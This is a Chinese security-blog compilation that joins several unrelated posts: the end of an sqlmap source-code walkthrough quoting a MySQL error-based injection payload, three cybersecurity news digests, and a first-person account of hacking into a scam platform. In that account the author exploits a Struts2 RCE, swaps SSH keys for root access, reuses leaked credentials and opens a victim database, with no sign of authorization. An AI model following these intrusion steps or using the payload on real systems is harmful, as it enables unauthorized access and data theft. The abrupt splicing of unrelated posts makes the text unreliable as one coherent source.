注入测试的时候会很习惯的在参数后面加个分号啊什么的，又或者是其他一些特殊的字符，出现运气好的话有可能会暴出数据的相关错误信息，而那个时候我们就可以根据所暴出的相关错误信息去猜测当前目标的数据库是什么。 并且最后生成的这个 payload 是能够闭合的 实际找个网站测试，如图，这就是报出的 SQL 数据库错误 判断在 lib/request/connect.py 的 1532 行 接着跟进 processResponse() 函数，这里和 waf 对比用的同一种方式，不再详细说明 其中 processResponse() 会调用到 ./lib/parse/html.py 中的 htmlParser() 函数，这一个函数就是根据不同的数据库指纹去识别当前的数据库究竟是什么。 最终实现这一功能的其实是 HTMLHandler 这个类，errors.xml 文件内容如图 这一配置文件的比较简单，其实也就是一些对应数据库的正则。sqlmap 在解析 errors.xml 的时候，然后根据 regexp 中的正则去匹配当前的页面信息然后去确定当前的数据库。这一步和 WAF 比对类似。 到此 sqlmap 就可以确定数据的版本了，从而选择对应的测试 Payload，后续我们会看到这是根据莫索引将 payloads 排序，然后选取对应数据库信息的 payloads 进行测试。减少 sqlmap 的扫描时间。 最后这个 DBMS 探测对应的是这一段信息 获取绝对路径与 XSS 探测 相比指纹识别，获取绝对路径的功能模块相对简单，利用正则匹配寻找出绝对路径。 XSS 的探测也比较简单，这里就不作代码分析了 6. 注入检测之正式注入 从启发式注入里面出来，到第 592 行，进行正式的注入检测，跟进 到第 130 行，获取所有的 payload，后续会根据数据库的信息构建索引，将符合索引的 payload 拿去攻击 往下走，先判断有没有做数据库信息的获取，如果有则跳过，如果没有就先进行上一步的启发式注入 接着根据通过报错得到的数据库信息建立索引，将对应最有效的 payload 拿出来。这些 payloads 会进行 while 循环 第 370 行，通过 cleanupPayload() 函数对 payload 进行处理，主要功能其实是做了 payload 的标签替换 最后替换过的 payload 长这样 "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('qbpxq',(SELECT (ELT(9125=9125,1))),'qxkvq','x'))s), 8446744073709551610, 8446744073709551610)))" 在 sqlmap 中将payload 分为了三部分，上面生成的 fstpayload 就是中间那部分 prefix + payload + suffix prefix 和 suffix 就是对应的，闭合前面的结合以及注释后面的结构，这两个属性主要是从 boundary 中进行获取的，boundary 就是前面加载的 boundaries.xml 配置文件，用来闭合的，所以这里作为了 prefix 和 suffix 最后的拼接 并分别对 prefix 和 suffix 进行 clean，然后进行组合，组合之后的 payload 就是 reqPayload，然后进行请求 发出请求最终还是通过 request.queryPage() 来实现的 请求完毕的结果经过 queryPage() 函数来获取界面，但是页面结果是由 kb.chars.start 和 kb.chars.stop 包裹着的 当第一次的注入不成功的时候，会不断变更 prefix，suffix，当 prefix 和 suffix 都变更完毕但还是无法注入时，才会变更 payload，取出另一个 payload 出来，直至 injectable 变量为 true，同时 output=1 并且 injectable=true 7. 爆数据库等操作 经过上一步正式注入的判断，得到的 injectable=true 参数，才能进行下一步的爆数据库操作. 爆库阶段主要是先经过四个函数处理数据后，再调用 action() 函数，跟进。 这里已爆库为例，先看 --dbs 参数有关的这一块，核心函数是 getDbs() 先根据后台数据库信息，输出日志 第 133 行，queries 就是存放之前初始化 queries.xml 的变量 首先通过 count(schema_name) 来获取数据库的个数，然后再通过 limit num,1 来依次获取数据库名，从 queries 变量中获取语句之后就会传递到 getValue 函数 跟进，前面做了一些基础的设置和 payload 的处理与赋值，比如第 401 行的 cleanQuery() 函数，将语句转换为大写，这里我就不跟进了。直接看关键语句，第 451 行，errorUse() 函数 在 errorUse() 中首先通过正则将 payload 中的各个部分都进行了获取 ，保存到了对应的 field 当中，最终经过一系列处理，取出了 payload 中的 schema_name 跳出 getFields() 函数，往下，将 expression 的值经过 replace 操作，赋值给了 countedExpression，最终得到的值是 'SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA' 第 337 行，跟进 _oneShotErrorUse() 函数，在这一个函数中，sqlmap 对目标网站发包，使用的 payload 为 countedExpression，目的是探测数据库个数（count） 具体业务发包在这里 最后将结果传入 extractRegexResult() 函数中进行正则提取 多线程的方式进行注入，而 runThreads() 函数调用了 errorThread() 函数，最终的注入业务还是由 errorThread() 函数来完成的 跟进一下 _errorFields() 函数，将每一个表进行 while 循环操作，再通过 limitQuery() 函数设置最后的 Limit 语句 最后成功 --dbs sqlmap 流程分析结束 0x04 小结 sqlmap 的流程分析需要非常重视这张图，当感觉代码看不下去的时候看一下这张图可以事半功倍。 在审计开始之前也可以看一下 utils 文件夹下的 python 文件，总体来说流程并不难，看正则的时候其实挺吃力的。

1、通用汽车探索在汽车中使用ChatGPT https://cybernews.com/tech/general-motors-explores-chatgpt-cars/ 通用汽车正在探索ChatGPT的用途，作为其与微软更广泛合作的一部分，一位公司高管告诉路透社。“ChatGPT将出现在一切领域，”通用汽车副总裁斯科特米勒上周在接受采访时表示。 2、据称LockBit在暗网上出售60GB德意志银行数据 https://cybernews.com/news/deutsche-bank-data-offered-up-on-dark-web/ 一名不知名的黑客提供了敏感文件的缓存，据称这些文件是由臭名昭著的LockBit勒索软件团伙从德意志银行窃取的。 3、两会热议健康码去留！主张其退出并删除数据或成代表委员共识 https://www.secrss.com/articles/52735 当疫情期间紧急应对的背景褪去，妥善处理健康码及背后大量数据或成为当务之急。 4、美媒：量子计算机将对网络安全构成重大威胁 https://www.secrss.com/articles/52729 美国防新闻网站1月20日发文称，五角大楼应该尽快在量子计算上采取行动，否则就会被竞争对手超越。文章认为，随着量子计算机不断发展，其对国防部的网络安全构成了重大威胁。 5、俄罗斯新冠疫苗 "机密 "信息遭遇泄露 https://cybernews.com/news/classified-documents-russian-sputnik-vaccine-online/ 黑客组织 KelvinSecurity 在网上共享了数百份文件，其中包含俄罗斯 Sputnik V 新冠肺炎疫苗开发的相关信息，其中一些文件甚至囊括了临床试验中已故参与者的姓名信息。 6、YoroTrooper组织针对独联体国家发起攻击 https://www.bleepingcomputer.com/news/security/yorotrooper-cyberspies-target-cis-energy-orgs-eu-embassies/ 至少从 2022 年 6 月开始，一个名为“YoroTrooper”的新攻击组织一直在开展网络间谍活动，目标是独立国家联合体 (CIS) 国家的政府和能源组织。根据 Cisco Talos 的说法，威胁行为者已经入侵了一个从事医疗保健的重要欧盟机构、世界知识产权组织 (WIPO) 和多个欧洲大使馆的账户。 7、ALPHV勒索组织声称已入侵了亚马逊Ring https://www.hackread.com/amazons-ring-hacked-alphv-ransomware/ ALPHV 是一个以使用 BlackCat 恶意软件而闻名的勒索软件组织，它声称对亚马逊广受欢迎的安全摄像头公司Ring的攻击负责，并威胁要泄露他们的数据。亚马逊目前还没有得到勒索软件攻击的证据，但是，该公司正在就数据泄露问题调查第三方供应商。 8、航空航天企业Safran集团或因错误配置泄露敏感数据 https://cybernews.com/security/key-aerospace-player-leaks-sensitive-data/ 根据 Cyber news 的研究，顶级航空公司 Safran Group 由于系统配置错误而导致自身容易受到网络攻击，可能持续了一年多，这突显了大型航空公司对攻击者防御的脆弱性。这家总部位于法国的跨国航空公司是全球第八大航空航天供应商， 2022 年的收入超过 190 亿欧元，它与仅次于波音的全球第二大航空航天公司空中客车公司合作制造航空航天设备。 9、攻击者使用网络钓鱼工具包每天发送数百万封电子邮件 https://thehackernews.com/2023/03/microsoft-warns-of-large-scale-use-of.html 一个开源的中间人攻击 ( AiTM ) 网络钓鱼工具包因其能够实现大规模攻击而被大量用于网络犯罪。Microsoft Threat Intelligence 团队正在追踪开发工具包的威胁行为者，其名称为DEV-1101。AiTM网络钓鱼攻击通常能够规避多因子身份验证 (MFA) 保护，因此这类攻击成功率更高。 10、CrowdStrike 发现了有史以来第一个Dero 加密货币挖矿活动 https://securityaffairs.com/143520/cyber-crime/dero-crypto-mining-campaign.html CrowdStrike发现了首个针对Kubernetes基础设施的Dero加密货币挖矿活动。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

平平无奇的客服平台： 这个客服平台是有RCE的，如果上传到的不是oss服务器，存储在本地服务器的话， 在返回端口的url是存在st2。 root权限，由于是客服后台服务器，没有啥有用价值的信息。 直接替换私钥连服务器。 继续翻找有用的信息。 配置文件里也只有mongodb和redis的连接信息。 历史命令和登录ip历史是阿里云服务器。 扫下端口，8092有个目录遍历，好像是专门用来放项目的。 点开test看看： 下载过来解包看看： 这咋有个ip，root和密码，不会是那个开发人才留下的吧，泪目了家人们。 尝试连接，还真可以。 连接数据库看看，8w多受害者，佩服。 然后再回到之前扫出来的端口， 8094是有个web项目。 在数据库获取到后台url  配合数据库和登录日志获取到国内技术嫌疑人。 IP和经纬度是在国内。 总结一下，下班。

1、LockBit 声称窃取了 Maximum Industries 系统中 SpaceX 机密数据 https://securityaffairs.com/143495/cyber-crime/lockbit-ransomware-gang-spacex-files.html LockBit 勒索软件组织声称从 Maximum Industries 的系统中窃取了属于 SpaceX 的机密数据。Maximum Industries 是一家提供零件生产和制造全方位服务的承包商。 2、Microsoft 周二补丁日修复了被积极利用的 Outlook 零日漏洞 https://securityaffairs.com/143486/security/microsoft-patch-tuesday-march-2023.html 2023年3月的微软补丁周二更新解决了74个漏洞，其中包括在勒索软件攻击中被利用的Windows零日漏洞。 3、Adobe 修复了被利用的ColdFusion高危漏洞 https://securityaffairs.com/143479/security/adobe-cold-fusion-exploited-bug.html Adobe 发布了 ColdFusion 2021 和 2018 版的安全更新，以解决一个严重漏洞，该漏洞被跟踪为 CVE-2023-26360（CVSS 分数 8.6），该漏洞在非常有限的攻击中被利用。 4、Microsoft SmartScreen 零日漏洞被利用来传播 Magniber 勒索软件 谷歌的威胁分析小组 (TAG) 表示，一个网络犯罪组织一直在利用 Microsoft SmartScreen 安全功能中的零日漏洞来传播 Magniber 勒索软件。该漏洞被追踪为CVE-2023-24880，至少从 1 月起就已被利用。 5、研究人员发布Makop勒索组织攻击武器分析 https://securityaffairs.com/143452/malware/dissecting-makop-ransomware.html 网络安全研究员 Luca Mella 分析了 Makop 勒索软件最近一次攻击活动中使用的攻击武器。Makop 勒索软件组织的武器库是一种混合型武器库：它既包含定制开发的工具，也包含从公共存储库中获取的现成软件。 6、研究披露针对巴西银行的安卓GoatRAT木马变种 https://blog.cyble.com/2023/03/14/goatrat-android-banking-trojan-variant-targeting-brazilian-banks/ 在过去的六个月中，包括 BrasDex、Xenomorph 和 PixPirate 在内的多个安卓银行木马已经整合了一个自动转账系统 (ATS) 框架，允许攻击者在受感染的设备上进行未经授权的转账汇款。Cyble Research & Intelligence Labs (CRIL) 捕获到一种新的利用 ATS 框架执行欺诈交易的GoatRAT银行木马。 7、医疗供应商Zoll Medical数据泄露影响100万人 https://www.securityweek.com/zoll-medical-data-breach-impacts-1-million-individuals/ 医疗技术供应商 Zoll Medical 通知大约 100 万人，表示他们的个人信息可能在最近的数据泄露事件中遭到泄露。Zoll 开发和销售用于高级急救护理的医疗设备和软件，包括心脏监测、氧疗、通气、数据管理等。该公司表示，数据泄露是在 1 月底发现的，当时他们发现其内部网络上存在异常活动。 8、GitHub 2FA 计划增加短信、账户锁定保障措施 https://www.techtarget.com/searchsoftwarequality/news/365532274/GitHub-2FA-plan-adds-SMS-account-lockout-safeguards GitHub 从周一开始实施帐户 2FA 要求，已在其分阶段推出计划中添加了 SMS 支持和新的帐户锁定预防功能。 9、西门子周二修复了 ICS 产品中的 100多个漏洞 https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-address-over-100-vulnerabilities 西门子和施耐德电气在其 2023 年 3 月补丁星期二安全公告中解决了 100 多个漏洞。 10、Fortinet FortiOS 软件中的漏洞被利用攻击政府实体和大型组织 https://securityaffairs.com/143458/hacking/attacks-fortinet-fortios.html 未知威胁参与者正在利用 Fortinet FortiOS 软件中的一个漏洞，该漏洞被跟踪为CVE-2022-41328，该漏洞可能允许特权攻击者通过精心设计的 CLI 命令读取和写入任意文件。CVE -2022-41328 漏洞（CVSS 评分：6.5）是 FortiOS 中的一个路径遍历问题，可导致任意代码执行。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、De-Fi平台Euler 因闪电贷攻击损失近 2 亿美元 https://www.securityweek.com/euler-loses-nearly-200-million-to-flash-loan-attack/ 总部位于英国伦敦的 De-Fi 平台公司 Euler 因闪贷攻击损失了 1.96 亿美元。 2、FBI：2022年网络犯罪损失超过100亿美元。 https://www.securityweek.com/cybercrime-losses-exceeded-10-billion-in-2022-fbi/ 2022 年，FBI 收到超过 80 万起与网络犯罪相关的投诉，损失总额超过 100 亿美元。虽然投诉数量与 2021 年相比有所减少，但损失从 69 亿美元增加到 103 亿美元。在过去五年中，该机构共收到 326 万起投诉，造成 276 亿美元的损失。 3、新的“GoBruteforcer”僵尸网络以 Web 服务器为目标 https://www.securityweek.com/new-gobruteforcer-botnet-targets-web-servers/ 据 Palo Alto Networks 报道，最近发现的一个基于 Golang 的僵尸网络以运行 FTP、MySQL、phpMyAdmin 和 Postgres 服务的 Web 服务器为目标。 4、员工将公司机密数据发送给ChatGPT可能导致敏感数据泄露 https://securityaffairs.com/143394/security/company-data-chatgpt-risks.html 研究人员分析了来自不同行业的160万名工作人员使用ChatGPT的情况。他们报告称，5.6％的人在工作场所中使用过它，并且自推出以来有4.9％的人向ChatGPT提供了公司数据。 ChatGPT利用这些数据构建其知识库，但会公开分享基于此构建的信息。ChatGPT在工作场所的使用成为了一个严重问题，可能会导致敏感和机密数据泄露。因此，像JP Morgan和Verizon这样的公司出于对机密数据的担忧而封锁了该聊天机器人的访问。 5、大规模网络攻击劫持东亚网站重定向至成人和博彩网站 https://thehackernews.com/2023/03/large-scale-cyber-attack-hijacks-east.html 自2022年9月初以来，一场大规模恶意网络攻击已经劫持了数千个面向东亚受众的网站，将访问者重定向到成人主题内容。 6、假ChatGPT Chrome扩展程序劫持Facebook账户进行恶意广告推销 https://thehackernews.com/2023/03/fake-chatgpt-chrome-extension-hijacking.html 已发现假冒的 ChatGPT Chrome 浏览器扩展程序具有劫持 Facebook 帐户和创建流氓管理员帐户的功能。 7、AI生成的YouTube视频教程传播信息窃取恶意软件 https://thehackernews.com/2023/03/warning-ai-generated-youtube-video.html 威胁行为者越来越多地使用AI生成的YouTube视频传播各种窃取恶意软件，例如Raccoon、RedLine和Vidar。这些视频通过假装是有关如何下载破解版软件（如Photoshop、Premiere Pro、Autodesk 3ds Max、AutoCAD等）的教程来诱骗用户。 8、研究人员发现 Akuvox E11 智能对讲机存在十多个安全漏洞 https://thehackernews.com/2023/03/researchers-uncover-over-dozen-security.html 中国公司Akuvox制造的智能对讲机产品E11被披露了十多个安全漏洞。Claroty安全研究员Vera Mens在一篇技术文章中表示：“这些漏洞可能允许攻击者远程执行代码，以激活和控制设备的摄像头和麦克风，窃取视频和图像”。 9、Dark Pink APT组织利用KamiKakaBot攻击东南亚国家 https://thehackernews.com/2023/03/kamikakabot-malware-used-in-latest-dark.html Dark Pink高级持续威胁 (APT) 攻击者与一系列针对东南亚国家政府和军事实体的新攻击有关，该攻击使用名为 KamiKakaBot 的恶意软件。Dark Pink，也称为 Saaiwc，今年早些时候首次被 Group-IB 披露。该组织被怀疑来自亚太地区，并且至少从 2021 年年中开始活跃，并在 2022 年更为活跃。 10、以全球公司为目标的Medusa勒索软件团伙愈发活跃 https://www.freebuf.com/news/360208.html 据BleepingComputer消息，过去两年一向低调的勒索软件组织Medusa（美杜莎）近期开始变得活跃，目标针对全球范围内的多个企业组织，并索要数百万美元赎金。本月初，Medusa袭击了明尼阿波利斯公立学校 (MPS) ，索要100 万美元的赎金。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。